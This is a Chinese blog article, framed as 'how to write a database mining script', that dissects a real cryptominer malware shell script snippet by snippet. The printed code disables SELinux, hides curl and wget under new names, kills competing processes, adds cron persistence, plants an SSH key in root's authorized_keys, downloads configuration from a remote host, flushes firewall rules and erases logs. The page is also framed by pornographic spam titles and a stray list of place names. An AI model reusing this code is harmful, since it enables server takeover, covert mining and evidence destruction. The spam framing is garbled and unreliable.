亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

數據庫的挖礦腳本怎么寫

發布時間:2022-01-17 17:07:19 來源:億速云 閱讀:173 作者:iii 欄目:安全技術

本篇內容介紹了“數據庫的挖礦腳本怎么寫”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!

01.Code 1

#!/bin/sh

腳本的第一行,看起來是一行注釋,但其實并不是。它規定了接下來的腳本,將要采用哪一個 SHELL 執行。

像我們平常用的 bash、zsh 等,屬于 sh 的超集,這個腳本使用 sh 作為執行的 shell,具有更好的可移植性。

02.Code 2

setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

setenforce 是 Linux 的 selinux 防火墻配置命令,執行 setenforce 0 表示關閉 selinux 防火墻。2  代表的是標準錯誤(stderr)的意思。

所以后面,使用重定向符,將命令的錯誤輸出定向到 /dev/null 設備中。這個設備是一個虛擬設備,意思是什么都不干。非常適合靜悄悄的干壞事。

03.Code 3

sync && echo 3 >/proc/sys/vm/drop_caches

腳本貼心的幫我們釋放了一些內存資源,以便獲取更多的資源進行挖礦。

眾所周知,Linux 系統會隨著長時間的運行,會產生很多緩存,清理方式就是寫一個數字到 drop_caches 文件里,這個數字通常為 3。

sync 命令將所有未寫的系統緩沖區寫到磁盤中,執行之后就可以放心的釋放緩存了。

04.Code 4

crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur

沒錯,上面這些語句就是完成了一些普通的操作。值得注意的是,它把我們的一些常用命令,使用 mv 命令給重名了。

這在執行命令的時候,就會顯得分成功能的蛋疼。這腳本已經更改了計算機的一些文件,屬于犯罪的范疇了。

腳本為了復用一些功能,抽象出了很多的函數。我們直接跳到 main 函數的執行,然后看一下這個過程。

05.Code 5

首先是 kill_miner_proc 函數。代碼很長,就不全部貼出來了。

kill_miner_proc() {     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9   ...     pkill -f biosetjenkins     pkill -f Loopback     ...     crontab -r     rm -rf /var/spool/cron/*

挖礦領域是一個相愛相殺的領域。這個方法首先使用 ps、grep、kill 一套組合,干掉了同行的挖礦腳本,然后停掉了同行的 cron  腳本,黑吃黑的感覺。

在這段腳本里,使用了 pkill 命令。這個命令會終止進程,并按終端號踢出用戶,比較暴力。

06.Code 6

接下來執行的是 kill_sus_proc 函數。

ps axf -o "pid"|while read procid do ... done

ps 加上 o 參數,可以指定要輸出的列,在這里只輸出的進程的 pid,然后使用 read 函數,對 procid 進行遍歷操作。

07.Code 7

ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi

上面就是遍歷操作過程了,我們可以看到 if 語句的語法。其中 $? 指的是上一個命令的退出狀態。

0 表示沒有錯誤,其他任何值表明有錯誤。-ne 是不等于的意思,意思就是能夠匹配到 tmp 這個字符串。

08.Code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done

呵呵,上面又來了一次循環遍歷。不過這次針對的目標,是 CPU 使用超過 40% 的進程。這就有點狠了:影響我挖礦的進程,都得死!相煎何太急。

09.Code 9

再接下來,腳本針對不同的用戶屬性,進行了不同的操作。

首先是 root 用戶。通過判斷是否存在 $rtdir 文件,來確定是否是 root 權限。

chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice

使用 chattr 命令,把一些重要的文件,搞成不能任意改動的只讀屬性,也是夠損的。然后,操作 cron 程序,把腳本的更新服務加入到定時中。

就是下面這段腳本。

10.Code 10

if [ ! -f "/usr/bin/crontab" ] then     echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else     [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi

注意 [[ $cont =~ "update.sh" ]] 這以小段代碼,怪異的很。[[ ]] 是 shell  中內置的一個命令,支持字符串的模式匹配。

使用 =~ 的時候,甚至支持 shell 的正則表達式,強大的令人發指。它的輸出結果是一個 bool 類型,所以能夠使用||進行拼接。

而后面的單小括號 (),是的是一個命令組,括號中多個命令之間用分號隔開,最后一個命令可以沒有分號;和 `cmd` 的效果基本是一樣的。

11.Code 11

搞完了定時任務,就要配置 ssh 自動登錄了,通過把公鑰追加到信任列表中就可以。

chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

12.Code 12

說曹操曹操就到,下面的腳本就使用了 `` 進行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then     pkill -f sysupdate     rm /etc/config.json     downloads $config_url /etc/config.json $config_url_backup else     echo "no need download" fi

通過一系列騷操作,獲取到配置文件的大小,如果判斷文件大小不一致,那么就重新下載一個。這就用到了 downloads 函數。

shell 中的函數,看起來比較怪異,后面的參數傳遞,就像是腳本傳遞一樣,傳送給函數。

13.Code 13

downloads $config_url /etc/config.json $config_url_backup

這句話,就傳遞了三個參數。當然,文件要從遙遠的服務器上下載。域名是 .de 結尾的,證明是個德國的域名,其他的我們一無所知。

downloads() {     if [ -f "/usr/bin/curl" ]     then     echo $1,$2         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         else             curl --connect-timeout 10 --retry 100 $3 > $2         fi     elif [ -f "/usr/bin/cur" ]     then         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         else             cur --connect-timeout 10 --retry 100 $3 > $2 fi     elif [ -f "/usr/bin/wget" ]     then         wget --timeout=10 --tries=100 -O $2 $1         if [ $? -ne 0 ]     then         wget --timeout=10 --tries=100 -O $2 $3         fi     elif [ -f "/usr/bin/wge" ]     then         wge --timeout=10 --tries=100 -O $2 $1         if [ $? -eq 0 ]         then             wge --timeout=10 --tries=100 -O $2 $3         fi     fi }

我認為,這段代碼作者寫的又臭又長,完全沒有體現出自己應有的水平。應該是趕工期,沒有想好代碼的復用,才會寫的這么有失水準。

我們上面說到,腳本改了幾個命令的名字,其中就有 curl。這個命令是如此的強大,以至于腳本的作者都忍不住加了不少參數:

  • -I:用來測試 http 頭信息。

  • -m:設置最大傳輸時間。

  • -o:指定保持的文件名。這里是 /dev/null,呃呃呃......

  • -s:靜默模式,不輸出任何東西。

  • --connect-timeout:連接超時時間。

  • --retry:重試次數,好狠,100 次。

如果沒有 curl?那就使用替補的 wget,套路都是一樣的。

14.Code 14

接下來是一系列相似的操作,最后,對 iptables 一批操作。

iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload

15.Code 15

細心的腳本編寫者,還使用命令清理了操作日志。

history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history

“數據庫的挖礦腳本怎么寫”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站,小編將為大家輸出更多高質量的實用文章!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

德格县| 宁武县| 贵州省| 泸定县| 虎林市| 汝城县| 临泽县| 德惠市| 贵阳市| 石首市| 阳朔县| 玉环县| 达拉特旗| 文水县| 邢台市| 科技| 柘城县| 高州市| 贡山| 汤阴县| 柏乡县| 东源县| 拉萨市| 仙居县| 广元市| 于田县| 阿城市| 泰和县| 来宾市| 揭东县| 西充县| 渝中区| 望都县| 吉木萨尔县| 龙海市| 万年县| 肇州县| 梨树县| 南华县| 莒南县| 泰和县|